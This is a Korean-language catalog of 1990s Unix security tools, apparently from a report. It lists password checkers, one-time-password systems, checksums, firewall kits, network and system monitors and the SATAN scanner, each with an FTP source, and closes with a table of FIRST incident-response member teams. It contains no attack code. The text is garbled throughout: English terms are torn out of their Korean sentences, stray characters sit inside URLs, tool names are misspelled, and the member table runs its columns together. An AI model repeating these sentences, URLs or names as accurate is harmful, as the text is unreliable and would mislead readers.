입 수 처 ftp://ftp.dartmouth.edu/pub/security/
보안 도구명 obvious-pw
지원 시스템
주요 기능 영어 구성 특성을 이용 영어 단어처럼 보이는 패스워드의 사용 방지-
입 수 처 ftp://ftp.sura.net/pub/security/programs/unix/obvious-pw.Z
보안 도구명 anlpasswd
지원 시스템
주요 기능 적절하지 않은 패스워드 사용을 방지-
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/anlpasswd/
보안 도구명 Kerberos
지원 시스템
주요 기능 물리적인 보안성이 없는 네트워크용 네트워크 인증 툴-
네트워크 상에서 상호 인증 및 도청 및 회신 공격을 방지-
등의 암호알고리즘을 이용 데이터 스트림의 무결성과 비 성 제공- DES
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/kerberos/
보안 도구명 pidentd
지원 시스템
주요 기능 연결 요청을 하는 사용자 확인 위해 원격 호스트에 질의- TCP
을 구현함- RFC1413
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/ident/servers
보안 도구명 sra
지원 시스템 전체 소스가 제공됨Solaris 1.x, Solaris 1.x, Linux, *
주요 기능 보안 코드를 사용하여 네트워크상 및 인터넷 에서 및- RPC (LAN ) FTP
에 대해 암호화된 인증 기능을 제공TELNET
서버와 클라이언트는 의 사용 여부를 상호 협상하므로 표준 및 과 함- SRA FTP TELNET
께 사용 가능
외부의 키 서버나 티켓 서버를 필요로 하지 않음-
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/nuix/TAMU/
보안 도구명 S/Key
지원 시스템 및 도 지원PC Mac
주요 기능 일회용 패스워드를 구현 의 사용을 권장함- , * OPIE
입 수 처 ftp://thumper.bellcore.com/pub/nmh/
보안 도구명 OPIE(One Time Password in Everything)
지원 시스템 대부분의 Unix
주요 기능 를 기반으로 개발됨- S/Key
일회용 패스워드 표준 구현- IETF (OTP) RFC-1938
에 비해 지원 및 기타 보안 강화- S/Key MD4, MD5
입 수 처 ftp://ftp.nrl.navy.mil/pub/security/nrl-opie/
암호화 체크섬 도구2. (Checksum)
보안 도구명 MD2, B. Kaliski
지원 시스템
주요 기능 메시지 다이제스트 알고리즘-
입 수 처 http://ds.internic.net/rfc/rfc1319.txt
보안 도구명 MD4, by Ron Rivest
지원 시스템
주요 기능 메시지 다이제스트 알고리즘- ,
각 단계의 라운드를 사용- 16 3
입 수 처 http://ds.internic.net/rfc/rfc1320.txt
보안 도구명 MD5, by Ron Rivest
지원 시스템
주요 기능 메시지 다이제스트 알고리즘- ,
각 단계의 라운드 사용- 16 4
입 수 처 http://ds.internic.net/rfc/rfc1321.txt
비 고
보안 도구명 Sneru, by Ralph Merkle
지원 시스템
주요 기능 의 보안 해쉬 함수- Xerox
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/snefru/
방화벽 도구3.
보안 도구명 TIS Firewall Tool Kit
지원 시스템 기반의 시스템BSD Unix
주요 기능 인터넷 방화벽 구축용 소프트웨어 키트-
전체 모듈의 소스 코드로 제공됨- C
입 수 처 ftp://ftp.tis.com/pub/firewalls/toolkit/
보안 도구명 tcpr
지원 시스템
주요 기능 방화벽을 통해 및 명령들을 수행할 수 있게 해줌- tcp telnet
형식의 서버 릴레이 프로그램 및 클라이언트로 구성됨- inetd , ,
스크립트로 작성됨- perl
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/tcpr/
보안 도구명 접근Gateway Utilities
지원 시스템
주요 기능 방화벽 호스트에 계정이 없어도 네트워크 방화벽을 통해 인터넷에 접근을-
가능하게 재줌
프록시 형식으로 동작하는 수정된 및 프로그램- FTP TELNET
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/socks/
보안 도구명 Socks
지원 시스템
주요 기능 인터넷 소켓 서버 로서 편리하고 안전한 연결을 방화벽을 통해 제공함- “ ”
단순한 프로토콜을 통해 상호 작용하는 클라이언트 라이브러리루틴과 대몬 으로- (Daemon)
구성됨
입 수 처 내찬ftp://coast.cs.purdue.edu/pub/tools/unix/ /
보안 도구명 udprelay
지원 시스템
주요 기능 방화벽을 통해 패킷을 전달해줌- UDP
방화벽 호스트에서 수행되는 디먼 프로세스임-
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/
보안 도구명 xforward
지원 시스템
주요 기능 네트워크 방화벽을 통해 윈도우 시스템 연결을 제공함- X
입 수 처 ftp://crl.dec.com/pub/DEC/
네트워크 감시 도구4.
보안 도구명 Argus
지원 시스템 SunOS 4x, Solaris 2.3, SGI IRIX 5.2
주요 기능 범용 네트워크 트랜잭션 감사용 툴- IP
응용프로그램 레벨의 디먼-
지정된 인터페이스에서 데이터 그램을 전부 읽어 트래픽 상태보고-
및 패키지를 필요로함- libpcap tcp_warppers
입 수 처 ftp://ftp.sei.cmu.edu/pub/argus-1.5/
보안 도구명 Courtney
지원 시스템
주요 기능 네트워크를 감시하여 조사 공격을 시도하는 기계를 판별함- SATAN /
로부터 입력을 받아 주어진 시간 내에 특정 호스트로부터의 새로운 서비스 요청- tcpdump
의 수를 감시
입 수 처 ftp://ciac.llnl.gov/pub/ciac/sectools/unix/
보안 도구명 Gabriel
지원 시스템 전체 로 작성 배포됨Solaris 1.x, Solaris 2.x, * C ,
주요 기능 네트워크를 감시하여 조사 공격을 시도하는 기계를 판별함SATAN /
및 설치 프로그램들로 구성됨- gabriel_client, gabriel_server,
사용자 설정 보고서 또는 호출기를 통해 관리자에게 통보함- , email,
입 수 처 ftp://ftp.lat.com/gabriel-1.0.tar.Z
보안 도구명 Netlog
지원 시스템 SunOS 4.x, SunOS 5.x
주요 기능 및 트래픽 기록 시스템으로서 의심스러운 트래픽을 검출- TCP UDP
및 로 구성됨- tcplogger, udplogger, extract, netwaatch
의 또는 의 를 사용- SunOS 4.x nit SunOS 5.x DLPI
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/TAMU/
보안 도구명 NETMAN
지원 시스템
주요 기능 네트워크 감시 및 비주얼 툴-
및 툴로 구성됨- Etherman, interman, packetman, loadman, Geotraceman, Analyser
입 수 처 ftp://ftp.cs.curtin.edu.au/pub/netman/
보안 도구명 NID(Network Intrusion DDetector), by CSTC
지원 시스템 SunOS 4.1.x, Solaris 2.4
주요 기능 인가되지 않은 시스템에의 침입 인가된 시스템에 대한 인가 되지 않았다거- ,
나 의심가는 작업의 시도 등을 탐지하고 분석함
공격 징후의 인식 비정상 상황 탐지 취약점 모델의 세 가지 기법조합- , ,
실시간 및 사후 분석이 가능-
관계기관에만 공개- DoD/DoE
입 수 처 ftp://ftp.navya.com/pub/vikas/nocol.tar.gz
보안 도구명 NOCOL(Network Operations Center On-Line), by JVNC-Net
지원 시스템
주요 기능 또는 접속 가능성 변수 이름 서버 호스트 성능- ICMP RPC , RMON , , , SNMP
트랩 모뎀회선 사용 및 라우터 및 서비스 피어 등의 다양한 네트, , AppleTalk Novell , BGP
워크 변수들을 감시
다수의 개별적인 감시툴의 집합으로 확장성이 좋으며 새로운 모니터 추가가-
용이함
확장을 위해 인터페이스가 제공됨- perl
입 수 처 ftp://ftp.navya.com/pub/vikas/nocol.tar.gz
네트워크 보안 도구5.
보안 도구명 SATAN(System Administrator Tool for Analyzing Networks), by Dan
Farmer and Wietse Venema
지원 시스템
주요 기능 원격 시스템의 취약점을 분석-
인터넷의 서브 도메인을 체계적으로 옮겨 다니며 응답하는 각 시스템의 취약점을 분석함-
공개용 에 비해 강력한 기능을 제공- ISS
클라이언트를 이용하여 그래픽 사용자 인터페이스 제공- WWW
취약점 및 조치 방법에 대한 상세한 설명 제공-
검사 대상으로 개별 기계 또는 도메인을 지정할 수 있음-
검사의 심도를 로 지정 가능- Light, Normal, Heavy
확정성 및 적응성이 뛰어남-
입 수 처 햎ftp://ciac.llnl. /pub/ciac/sectools/unix/satan/
보안 도구명 Internet Scanner SAFEsuite, by Internet Security Systems
지원 시스템 Windows NT 3.51, 4.0, IBM ALX 3.2.5+, HP-UX 9.05+, SunOS 4.1.3+,
Solaris 2.3+,Linux 1.2.x, 1.3.x
주요 기능 네트워크 보안 평가 툴로서 의 후속 버전- Internet Scanner
보안 취약점을 발견 수정하고 수정 사항의 유지를 지속 감시할 수 있는 피드백 루프 구- ,
축
웹 방화벽 인트라넷 시스템에 대한 각각의 보안 평가 툴을 제공함- , , ,
웹 사이트 방화벽 워크스테이션 및 서버 점검 가능- , , , UNIX, Windows NT Windows 95
입 수 처 평가용 제품http://www.iss.net/eval/sw.html ( )
보안 도구명 logdeanon, by Wietse Venema
지원 시스템
주요 기능 및 의 대체 프로그램 제공- rshd, rlogind, ftpd, rexecd, login, telnetd
표준의 벤더 버전에 비해 더 많은 로그를 기록-
일회용 패스워드 패키지 지원- S/Key
입 수 처 ftp://coast.css.purdue.edu/pub/tools/unix/logdaemon/
보안 도구명 portmap, byWietse Venma
지원 시스템
주요 기능 표준 의 대체 프로그램으로서 에 대해 알려진 대부분의 보안- portmap portmap
허점을 수정함
패스워드 파일의 도용 인증되지 않은 명령 및 파일핸들의 도용 방지를- NIS , ypset NFS
포함함
입 수 처 ftp://ftp.win.tue.nl/pub/security/portmap_3.shar.Z
보안 도구명 rpcbind, by Wietse Venema
지원 시스템
주요 기능 의 대체 프로그램으로서 형태의 접근 제어 및 풍부한- Sun rpcbind tcp wrapper
로깅을 제공함
및 기타 서비스에의 원격 접근을 제어- NIS(YP), NFS, rpc
네트워크 주소를 기반으로한 호스트 접근 제어 가능-
프로세스로부터의 요청은 일반 권한의 포트를 통해 전달- rpcbind
요청은 근원을 확인하려하는 디먼으로의 요청은 거부함- rpc
입 수 처 ftp://ftp.win.tue.nl/pub/security/rpcbind_1.1.tar.Z
보안 도구명 screend, by Jeff Mogul
지원 시스템 형식의 네트워킹 커널을 사용하는 대부분의 시스템에서 동작* Berkeley
주요 기능 제공된 디먼과 수정된 커널을 이용하여 모든 패킷에 대해 필터링함-
필터링은 근원 주소 목적 주소 또는 패킷내의 임의의 바이트 또는 바이트의 집합에 딸- , ,
라 실해됨
커널의 수정이 필요함-
입 수 처 ftp://ftp.vix.com/pub/vixie/
보안 도구명 Securelib, by William LeFebre
지원 시스템
주요 기능 시스템의 공유 라이브러리를 대체- SunOS 4.1.x
원래의 버전과 호환되는 새로운 버전의 네트워킹 시스템 호출- accept, recvfrom, recvmsg
을 제공함
새로운 호출은 구성 파일에 따라 접속을 개시하는 기계의 주소를 점검하여 접속이 허용-
될 것인지를 결정
입 수 처 ftp://ftp.vix.com/pub/vixie
보안 도구명 TCP Wrappers, by Wietse Venema
지원 시스템
주요 기능 호스트의 및 포트에 접근하는- tftp, exec, ftp, rsh, telnet, rlogin, finger, systat
대상의 감시 및 제어 기능을 제공
다른 프로그램들로 같은 방식으로 제어되고 감시될 수 있도록 하기 위한 라이브러리가-
제공됨
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/tcp_wrappers/
보안 도구명 접근ipacl(IP Control List). by Siemens
지원 시스템 기반SINIX-L (MX300(Intel) ), Interactive SVR4
주요 기능 모든 및 패킷들을 강제적으로 접근 제어 목록 기능을 통과 하도 록- TCP UDP
함
패킷들에 대해 소스 주소 목적 주소 소스 포트 번호 목적포트번호 등의 특성- , , , ,
에 따라 허용 거부 조건적 허용 조건적 거부를 결정할 수 있다, , , .
기존의 커널 소스에 대한 수정이 없이 작성되어 드라이버 설치 후 커- TCP/IP
널을 다시 빌드하기만 하면 됨
입 수 처 ftp://coast.cs.purdue.edu/pub/unix/ipacl/
보안 도구명 xindetd
지원 시스템
주요 기능 인터넷 서비스 디먼인 를 대체하여 원격 호스트의 주소 및 접속 시각에- inetd
의한 접근 제어를 지원함
서버 시작 시가 원격 호스트 주소 원격 사용자 이름 서버 실행 시간 및 요청- , , ,
된 동작 등에 대한 로깅을 제공
입 수 처 ftp://qiclab.scn.rain.com/pub/security/
시스템 감시 도구6.
보안 도구명 COPS(Computer Oracle and Password System), by Purdue University
지원 시스템
주요 기능 시스템의 취약점을 점검하여 관리자에게 보고함-
일부 취약점에 대해 자동적으로 수정함-
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/cops/
보안 도구명 cpm(Check Promiscuous Mode), by Carnegie Mellon Univ.
지원 시스템
주요 기능 시스템 내에 모드로 동작중인 네트워크 인터페이스가 있는지 검- promiscuous
사
침입자가 침투해 패킷 스푸핑 프로그램을 동작시켰을 가능성이 있음을 의미함*
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/cpm/
보안 도구명 ifstatus, by Dave Curry
지원 시스템
주요 기능 시스템 내에 모드로 동작중인 네트워크 인터페이스가 있는지 검- promiscuous
사
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/ifstatus/
보안 도구명 Merlin, by CIAC
지원 시스템
주요 기능 다른 보안툴을 패키지화 관리 등- (COPS, TAMU Tiger, Crack, Tripwire, SPI
지원)
웹브라우져를 이용한 그래픽 인터페이스 제공-
사용자 프로그래밍에 의해 다른 툴에 대한 지원 추가 가능 모든 프로그램은- (
로 작성됨perl )
사용된 툴 타입 작성일 대상 호스트별로 보고서를 확인 할 수 있는 편리한- , ,
브라우져 제공
입 수 처 ftp://ciac.llnl.gov/pub/ciac/sectools/unix/merlin/merlin.tar.gz
보안 도구명 Intelligent Auditing and Categorizing System, by RIACS
지원 시스템
주요 기능 현재의 파일 시스템의 내용을 사전에 작성된 목록과 비교하여 변경된 내용을-
보고함
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/binaudit.tar.gz
보안 도구명 Spar
지원 시스템
주요 기능 프로세스 어카운팅 레코드로부터 레코드를 선택하여 표시함-
과 같은 표준의 툴에 비해 빠르고 유연함- lastcomm UNIX
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/TAMU/spar-1.2.tar.gz
보안 도구명 SPI, by CSTC
지원 시스템
주요 기능 대부분의 시스템에 대한 보안 점검 기능의 제공함- UNIX
및 관련 기관용 툴* DoD DOE
입 수 처 http://ciac.llnl.gov/cstc/CSTCProducts.html#spi
보안 도구명 Swatch, by Stephen Hansen and Todd Atkins
지원 시스템
주요 기능 다수의 시스템의 대한 이벤트 감시-
일부 프로그램을 수정하여 로깅을 강화하고 주요 시스템 로그를 감시-
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/swatch/
보안 도구명 Tiger, by TAMU
지원 시스템 SunOS 4.1.x, 5.1, 5.2, Next 3.0
주요 기능 시스템의 보안상 문제점을 검사하는 스크립트들의 집합- UNIX
각 시스템에 대한 최신의 서명 파일 제공-
파일을 통해 점검 내용의 설정 가능- tigerrc
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/TAMU
보안 도구명 Tripwire, by Purdue University
지원 시스템
주요 기능 파일 시스템의 내용을 검사 각 파일의 디지털 서명을 작성하여 이후 변경된- ,
내용을 감지함
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/Tripwire/
보안 도구명 Watcher, by Kenneth Ingham
지원 시스템
주요 기능 사용자 정의 명령을 발행하여 출력을 분석 중요한 항목들을 점검해 시스템 운- ,
영자에게 보고
유연성 및 확장성 제공-
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/Watccher.tar.Z
일반 보안 도구7.
보안 도구명 gated, by Cornell University
지원 시스템
주요 기능 네트워크 라우팅 디먼으로서 및 프로토콜- BGP, EGP, RIP II, OSPF, HELLO
을 지원함
대부분의 시스템에서 제공되는 프로그램에 비해 유연하여 방화- UNIX routed
벽 구축시 또는 라우팅 정보의 공개 및 접수의 제한시에 유리함
입 수 처 ftp://gated.cornell.edu/pub/gated/
보안 도구명 WU-ftpd, by Washington University
지원 시스템
주요 기능 큰 사이트에서 사용하기 위한 디먼- ftp ftp
일반 버전에 비해 보안성을 비롯한 추가 기능을 제공함-
버전 이전의 제품은 심각한 보안 허점이 발견되었으므로 최신의 이후 버전을 사용* 2.4 2.4
해야함
입 수 처
보안 도구명 fremont, by University of Colorado
지원 시스템 SunOS 4.1.1
주요 기능 네트워크의 주요 특성 호스트 게이트웨이 토폴로지 등 을 찾아내기 위한 툴- ( , , )
프로토 타입
발견된 특성을 데이터 베이스로 저장하여 이후의 비정상 상황에 대해 관리자-
에게 통보
및 는 의 을 사용함- ARPwatch RIPwatch Sun Network Interface Tap
입 수 처 ftp://ftp.cx.colorado.edu/pub/cs/distribs/fremont/
보안 도구명 lsof, by Vic Abell
지원 시스템
주요 기능 시스템 내의 모든 열려있는 파일 네트워크 연결 파이프 스트림 등을 포함 을- ( , , )
나열함
및 를 기반으로 함- ofiles fstat
네트워크 연결에 대해 이를 사용하는 프로세스의 추적 등에 유용하게 사용됨-
입 수 처 ftp://coast.cs.purdue.edu/tools/unix/lsof/
보안 도구명 sendmail, by Eric Allman
지원 시스템
주요 기능 표준 에 대해 알려진 모든 보안 허점을 수정함- sendmail
표준 의 버그를 수정하고 기능을 향상시킴- sendmail
입 수 처 ftp://ftp.cs.berkeley.edu/ucb/sendmail/
보안 도구명 nfswatch, By Dave Curry and Jeff Mogul
지원 시스템
주요 기능 국지 네트워크에 대해 패킷을 감시해 서버 및 클라이언트 명 프로시져- NFS ,
명 등에 따라 해석
각 클라이언트가 서버로 보내는 트래픽의 양 클라이언트가 서버에 대해 엑세- ,
스하는 대상 및 기타 모드에 대해 알아내는데 유용함,
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/nfswatch/
보안 도구명 rdist, by University of Southern Califonia
지원 시스템
주요 기능 표준 에 배포되는 를 대체하는 소프트웨어 배포 유틸리티로 다양한- UNIX rdist
기능 추가
현재까지 알려진 의 보안 허점들을 보완함- rdist
관리자 가 필요 없음- Set uid " “
입 수 처 ftp://usc.edu/pub/rdist/
보안 도구명 tcpdump, by Van Jacobson
지원 시스템
주요 기능 의 와 유사하나 그 보다 강력하고 사용하기 쉬움- Sun etherfind
모드로 상의 모든 패킷을 포착- promiscuous Ethernet
다양한 옵션을 이용해 필요한 패킷에 대해서만 출력 가능-
입 수 처 ftp://ftp.ee.lbl.gov/
보안 도구명 traceroute, by Van Jacobson
지원 시스템
주요 기능 주어진 목적지로 가기 위한 시스템이 사용하는 라우트 패킷 추적- IP
입 수 처 ftp://ftp.ee.lbl.gov/traceroute.tar.Z
보안 도구명 host, by Erix Wassenaar
지원 시스템
주요 기능 도메인 명 시스템으로부터 정보를 얻기 위한 프로그램-
에 비해 유연하며 쉘 스크립트 내에서 사용하기에 적합함* nlslookup
입 수 처 ftp://ftp.uu.net/networking/ip/dns/host.tar.Z
보안 도구명 Dig, by Steve Hotz and Paul Mockapetris
지원 시스템
주요 기능 도메인 명 시스템 서버에 대해 문의하기 위한 명령 행 툴-
에 비해 사용 편리하며 쉘 스크립트 내 사용하기에 적합함* nlslookup
입 수 처 ftp://coast.cs.purdue.edu/pub/tools/unix/dig/
회원 현황 개 기관FIRST (55 )
MIL: Militery, COM : Company, GOV: Government, EDU: Education
지역 회원명 팀명( )서비스대상영역
비고
북미(41)
AFCERTANSCERTAppleBellcoreBCERTCERTCISCODISAASSISTCIACSSRTDOWEDSGEGoddard SFCGoldmanHPIBMJP MorganMCIMotorola (MCERT)MxCERTNASANASIRCNAVCIRTNCSA-IRSTNISTNorthwestern U.Ohaio S. U.Pennsylvania S. UPCERTSAICSGISBACERTStanford U.SUN MicroTRWUCERTSprintVeteran's H. A.Westinghouse
MILCOMCOMCOMCOM*(All)COMMILMILGOVCOMCOMCOMCOMGOVCOMCOMCOMCOMCOMCOMMXGOVGOVMILEDUGOVEDUEDUEDUEDUCOM/GOVCOMGOVEDUCOMCOMCOMCOMGOVCOM
미국 공군기업체(ANS CO+RE)기업체 애플( , Apple Computer)기업체(AT&T Bellcore)기업체 보잉사( , Boeing)미국 미국방성 지원CERT -기업체(CISCO)미국방성 Defence Information System Agency미국방망(DOD Internet)미에너지성(DOE, ESnet)기업체 디지탈( , Digital)기업체(DOW)기업체(EDS)기업체(General Elec.)미항공우주국(Space Flight Center (NASA))기업체(Sachs)기업체(HP)기업체(IBM)기업체(JP Morgan)기업체(MCI)기업체(Motorola)멕시코(Mexican CERT)미항공우주국(NASA Ames Res. Center)미항공우주국(Auto. ys. Incid. Resp. Capab)미해군(Naval Computer Incid. Resp. Team)미슈퍼컴응용센터NIST/CSRC북서대학교오하이오 대학교펜실배니아 대학교퍼듀 대학교기업체 보안관련 업체( , SAIC)기업체(Silicon Graphics)미중소기업청(Smaill Business Admin)스탠포드 대학교기업체 썬마이크로( )기업체(TRW)기업체(Unisys)기업체(SPRINT)미정부(Veteran's Health Administration)기업체 웨스팅하우스( )
유럽(13)
BSI/GISACARNET-CERTCCTACERT-ITCERT_NLDRADFN_CERTIsraelJANET-CERTMicro-Bit VCNORDUnetRenaterSWITCH-CERT
DEHRUKITNLGBDEILUKDEDKFRCH
독일(GISA)크로아티아영국 정부( , CCTA)이탈리아에덜란드영국 국방성( )독일이스라엘영국 대학( )독일 바이러스센터( )노르웨이프랑스스위스
아 태・(1) AUSCERT AU 호주
